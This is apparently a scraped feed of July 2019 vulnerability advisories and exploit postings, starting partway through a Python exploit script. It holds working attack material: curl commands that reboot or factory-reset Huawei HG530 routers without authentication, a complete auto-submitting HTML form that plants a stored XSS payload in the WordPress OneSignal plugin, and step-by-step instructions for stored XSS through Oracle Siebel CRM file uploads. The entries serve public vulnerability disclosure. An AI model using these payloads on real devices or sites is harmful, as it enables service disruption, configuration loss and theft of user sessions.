def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--ipaddress", help="IP of Target CVE-2019-13577")
    return parser.parse_args()

def main(args):
    doit(args.ipaddress,payload)


if __name__ == "__main__":
    if not len(sys.argv) > 1:
        print "[*] No args supplied see Help -h"
        exit()
    main(parse_args())





[POC Video URL]
https://www.youtube.com/watch?v=THMqueCIrFw


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: July 10, 2019
Second vendor notification attempt: July 13, 2019
No vendor replies.
July 17, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Source:packetstormsecurity.com

↧

Oracle Siebel CRM 19.0 Cross Site Scripting

July 17, 2019, 11:54 am

≫ Next: CKEditor CVE-2018-9861 Cross Site Scripting Vulnerability

≪ Previous: MAPLE Computer WBT SNMP Administrator 2.0.195.15 Buffer Overflow

Oracle Siebel CRM version 19.0 suffers from a persistent cross site scripting vulnerability.

MD5 | 4a88161473af34c0bd9555142c5d7a79

Download

# Exploit Title: Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting
# Date: 2019-07-17
# Exploit Author: Sarath Nair aka AceNeon13
# Contact: @AceNeon13
# Vendor Homepage: www.oracle.com
# Software Link: https://www.oracle.com/applications/siebel/
# Version: Siebel CRM (UI Framework) Version 19.0 and prior
# CVE: N/A
# Greetings: Deepu.tv

# PoC Exploit: Persistent Cross Site Scripting by Insecure File Upload
-----------------------------------------------------------------------
Vulnerable URL: http://<Siebel_Application>/finsadm_enu/start.swe?SWECmd=GotoView&SWEView=Activity+Attachment+View

#Steps to exploit the issue:
#1. Login to the CRM application and navigate to ‘Activities’ and click on ‘All Activities’.
#2. Edit one of the existing activity, or create a new one.
#3. Use the ‘New File’ menu in ‘attachments’ section to upload an HTML file with JavaScript payload (via a proxy tool).
#4. JavaScript payload will be triggered/rendered upon the victim user views the attached file.

# Description: The Siebel CRM application allows its users to upload any file types in most of the available file upload functionalities, later on, the uploaded file can be downloaded by another user with the appropriate privileges as part of the workflow. As such, it was possible to upload file with the “html” extension, (containing html and JavaScript code) thereby allowing to also perform Persistent Cross Site Scripting attack. 
# Impact: Cross-Site Scripting attacks do not target the server but rather its users. A hypothetical attacker could use the web server in order to trick other users into unwillingly executing malicious code saved on the server with XSS payload. The impacts of such attack can range from the disclosure of the user’s sensitive information to execution of arbitrary code on the target user’s system.
# Solution: Apply the Oracle Siebel CRM patch released on 16 July 2019

########################################
# Vulnerability Disclosure Timeline:
2017-December-23:  Discovered vulnerability
2017-December-25:  Vendor Notification
2017-December-27:  Vendor Response/Feedback
2019-July-16:  Vendor Fix/Patch
2019-July-17:  Public Disclosure
########################################

Warm regards,
Sarath Nair

Source:packetstormsecurity.com

↧

CKEditor CVE-2018-9861 Cross Site Scripting Vulnerability

July 18, 2019, 5:09 am

≫ Next: Huawei HG530 Reboot / Restore Authentication Bypass

≪ Previous: Oracle Siebel CRM 19.0 Cross Site Scripting

CKEditor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Note: This issue was previously titled 'Drupal CKEditor Plugin Cross Site Scripting Vulnerability'. The title have been changed to better reflect the vulnerability information.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
CKEditor version 4.5.10 through 4.9.1 are vulnerable; other versions may also be affected.

Information

Bugtraq ID: 103924
Class: Input Validation Error
CVE: CVE-2018-9861

Remote: Yes
Local: No
Published: Apr 17 2018 12:00AM
Updated: Jul 18 2019 11:00AM
Credit: Kyaw Min Thein.
Vulnerable: Oracle PeopleSoft Enterprise PeopleTools 8.57
Oracle PeopleSoft Enterprise PeopleTools 8.56
Oracle PeopleSoft Enterprise PeopleTools 8.55
Drupal Drupal 8.5.1
Drupal Drupal 8.5
Drupal Drupal 8.4.6
Drupal Drupal 8.4.5
Drupal Drupal 8.4.4
Drupal Drupal 8.4.3
Drupal Drupal 8.4.2
Drupal Drupal 8.4.1
Drupal Drupal 8.4
Drupal Drupal 8.3.9
Drupal Drupal 8.3.8
Drupal Drupal 8.3.7
Drupal Drupal 8.3.6
Drupal Drupal 8.3.5
Drupal Drupal 8.3.4
Drupal Drupal 8.3.3
Drupal Drupal 8.3.2
Drupal Drupal 8.3.1
Drupal Drupal 8.2.8
Drupal Drupal 8.2.7
Drupal Drupal 8.2.3
Drupal Drupal 8.2.2
Drupal Drupal 8.2.1
Drupal Drupal 8.2
Drupal Drupal 8.1.10
Drupal Drupal 8.1.9
Drupal Drupal 8.1.8
Drupal Drupal 8.0.4
Drupal Drupal 8.0.3
Drupal Drupal 8.0.2
Drupal Drupal 8.0.1
Drupal Drupal 8.1.7
Drupal Drupal 8.1.6
Drupal Drupal 8.1.5
Drupal Drupal 8.1.4
Drupal Drupal 8.1.3
Drupal Drupal 8.1.0
Drupal Drupal 8.0
Ckeditor Ckeditor 4.9.1
Ckeditor Ckeditor 4.9
Ckeditor Ckeditor 4.8
Ckeditor Ckeditor 4.7.3
Ckeditor Ckeditor 4.7.2
Ckeditor Ckeditor 4.7.1
Ckeditor Ckeditor 4.7
Ckeditor Ckeditor 4.6.2
Ckeditor Ckeditor 4.6.1
Ckeditor Ckeditor 4.6
Ckeditor Ckeditor 4.5.11
Ckeditor Ckeditor 4.5.10

Not Vulnerable: Drupal Drupal 8.5.2
Drupal Drupal 8.4.7
Ckeditor Ckeditor 4.9.2

Exploit

Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

References:

CKEditor 4 Changelog (Github)
CKEditor 4 Changelog (CKEditor)
CKEditor 4.9.2 (CKEditor)
CKEditor Releases (CKEditor)
Drupal Homepage (Drupal)
CKEditor 4.9.2 with a security patch released (ckeditor.com)
Oracle Critical Patch Update Advisory - July 2019 (Oracle)
SA-CORE-2018-003: Drupal core - Moderately critical - Cross Site Scripting - SA- (Drupal)

Source:www.securityfocus.com

↧

Huawei HG530 Reboot / Restore Authentication Bypass

July 18, 2019, 12:12 pm

≫ Next: WordPress OneSignal 1.17.5 Cross Site Scripting

≪ Previous: CKEditor CVE-2018-9861 Cross Site Scripting Vulnerability

Huawei HG530 suffers from unauthenticated remote reboot and restore vulnerabilities.

MD5 | 960066e7bdcc835fbc6e47444eb6a973

Download

Huawei HG530 Multiple Unauthenticated reboot and restore Vulnerability

===========================

The Huawei HG530 suffers from multiple Unauthenticated reboot and restore
vulnerability allows local attackers to reboot the device or to restore to
factory Configuration without user interaction.

==================

The vulnerability is located in form POST data parameter in
'Restart_factory' via path '/Forms/bottom_restart_1'

====================

Security issue PoC :

1-Rebooting :

curl -vv -X POST --path-as-is http://192.168.1.1/Forms/bottom_restart_1 -d '
defaltRomFlag=0&defaultIpFactory=192.168.1.1&Restart_factory=0'

2-Restoring :

curl -vv -X POST --path-as-is http://192.168.1.1/Forms/bottom_restart_1 -d '
defaltRomFlag=0&defaultIpFactory=192.168.1.1&Restart_factory=1'

========================

Source:packetstormsecurity.com

↧

WordPress OneSignal 1.17.5 Cross Site Scripting

July 18, 2019, 12:13 pm

≫ Next: Microsoft Windows RPCSS Activation Kernel Security Callback Privilege Escalation

≪ Previous: Huawei HG530 Reboot / Restore Authentication Bypass

WordPress OneSignal plugin version 1.17.5 suffers from a persistent cross site scripting vulnerability.

MD5 | 19cd11fce2ebe3bf42676b53160a66cb

Download

<!--

WordPress Plugin OneSignal 1.17.5 Persistent Cross-Site Scripting


Vendor: OneSignal
Product web page: https://www.onesignal.com
                  https://wordpress.org/plugins/onesignal-free-web-push-notifications/
Affected version: 1.17.5

Summary: OneSignal is a high volume and reliable push notification service
for websites and mobile applications. We support all major native and mobile
platforms by providing dedicated SDKs for each platform, a RESTful server API,
and an online dashboard for marketers to design and send push notifications.

Desc: The application suffers from an authenticated stored XSS via POST request.
The issue is triggered when input passed via the POST parameter 'subdomain' is
not properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context
of an affected site.

Tested on: WordPress 5.2.2
           Apache/2.4.39
           PHP/7.1.30


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5530
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5530.php


17.07.2019

-->


<html>
<body>
<script>history.pushState('', 'SHPA', '/')</script>
<form action="http://127.0.0.1/wp-admin/admin.php?page=onesignal-push" method="POST">
<input type="hidden" name="onesignal_config_page_nonce" value="f7fae30a4f" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=onesignal-push" />
<input type="hidden" name="app_id" value="14d99ab2-fc9d-1337-bc16-a8a6df479515" />
<input type="hidden" name="app_rest_api_key" value="M2IzZDA4MzItOGJmOS00YjRkLWE4YzEtZSLmMjllNjlkYmZl" />
<input type="hidden" name="subdomain" value=""><script>confirm(251)</script>" />
<input type="hidden" name="safari_web_id" value="" />
<input type="hidden" name="showNotificationIconFromPostThumbnail" value="true" />
<input type="hidden" name="showNotificationImageFromPostThumbnail" value="true" />
<input type="hidden" name="persist_notifications" value="platform-default" />
<input type="hidden" name="notification_title" value="hACKME" />
<input type="hidden" name="notifyButton_enable" value="true" />
<input type="hidden" name="notifyButton_showAfterSubscribed" value="true" />
<input type="hidden" name="notifyButton_prenotify" value="true" />
<input type="hidden" name="notifyButton_showcredit" value="true" />
<input type="hidden" name="notifyButton_customize_enable" value="true" />
<input type="hidden" name="notifyButton_size" value="medium" />
<input type="hidden" name="notifyButton_position" value="bottom-right" />
<input type="hidden" name="notifyButton_theme" value="default" />
<input type="hidden" name="notifyButton_offset_bottom" value="" />
<input type="hidden" name="notifyButton_offset_left" value="" />
<input type="hidden" name="notifyButton_offset_right" value="" />
<input type="hidden" name="notifyButton_color_background" value="" />
<input type="hidden" name="notifyButton_color_foreground" value="" />
<input type="hidden" name="notifyButton_color_badge_background" value="" />
<input type="hidden" name="notifyButton_color_badge_foreground" value="" />
<input type="hidden" name="notifyButton_color_badge_border" value="" />
<input type="hidden" name="notifyButton_color_pulse" value="" />
<input type="hidden" name="notifyButton_color_popup_button_background" value="" />
<input type="hidden" name="notifyButton_color_popup_button_background_hover" value="" />
<input type="hidden" name="notifyButton_color_popup_button_background_active" value="" />
<input type="hidden" name="notifyButton_color_popup_button_color" value="" />
<input type="hidden" name="notifyButton_message_prenotify" value="" />
<input type="hidden" name="notifyButton_tip_state_unsubscribed" value="" />
<input type="hidden" name="notifyButton_tip_state_subscribed" value="" />
<input type="hidden" name="notifyButton_tip_state_blocked" value="" />
<input type="hidden" name="notifyButton_message_action_subscribed" value="" />
<input type="hidden" name="notifyButton_message_action_resubscribed" value="" />
<input type="hidden" name="notifyButton_message_action_unsubscribed" value="" />
<input type="hidden" name="notifyButton_dialog_main_title" value="" />
<input type="hidden" name="notifyButton_dialog_main_button_subscribe" value="" />
<input type="hidden" name="notifyButton_dialog_main_button_unsubscribe" value="" />
<input type="hidden" name="notifyButton_dialog_blocked_title" value="" />
<input type="hidden" name="notifyButton_dialog_blocked_message" value="" />
<input type="hidden" name="prompt_customize_enable" value="true" />
<input type="hidden" name="prompt_action_message" value="" />
<input type="hidden" name="prompt_auto_accept_title" value="" />
<input type="hidden" name="prompt_site_name" value="" />
<input type="hidden" name="prompt_example_notification_title_desktop" value="" />
<input type="hidden" name="prompt_example_notification_message_desktop" value="" />
<input type="hidden" name="prompt_example_notification_title_mobile" value="" />
<input type="hidden" name="prompt_example_notification_message_mobile" value="" />
<input type="hidden" name="prompt_example_notification_caption" value="" />
<input type="hidden" name="prompt_accept_button_text" value="" />
<input type="hidden" name="prompt_cancel_button_text" value="" />
<input type="hidden" name="send_welcome_notification" value="true" />
<input type="hidden" name="welcome_notification_title" value="" />
<input type="hidden" name="welcome_notification_message" value="" />
<input type="hidden" name="welcome_notification_url" value="" />
<input type="hidden" name="notification_on_post" value="true" />
<input type="hidden" name="utm_additional_url_params" value="" />
<input type="hidden" name="allowed_custom_post_types" value="" />
<input type="hidden" name="custom_manifest_url" value="" />
<input type="hidden" name="show_notification_send_status_message" value="true" />
<input type="submit" value="Send" />
</form>
</body>
</html>

Source:packetstormsecurity.com

↧

Microsoft Windows RPCSS Activation Kernel Security Callback Privilege Escalation

July 18, 2019, 12:14 pm

≫ Next: Squid CVE-2019-13345 Multiple Cross Site Scripting Vulnerabilities

≪ Previous: WordPress OneSignal 1.17.5 Cross Site Scripting

On Microsoft Windows, the RPCSS Activation Kernel RPC server's security callback can be bypassed resulting in elevation of privilege.

MD5 | c4819f99e884719a97eddb52654d624b

Download

Source:packetstormsecurity.com

↧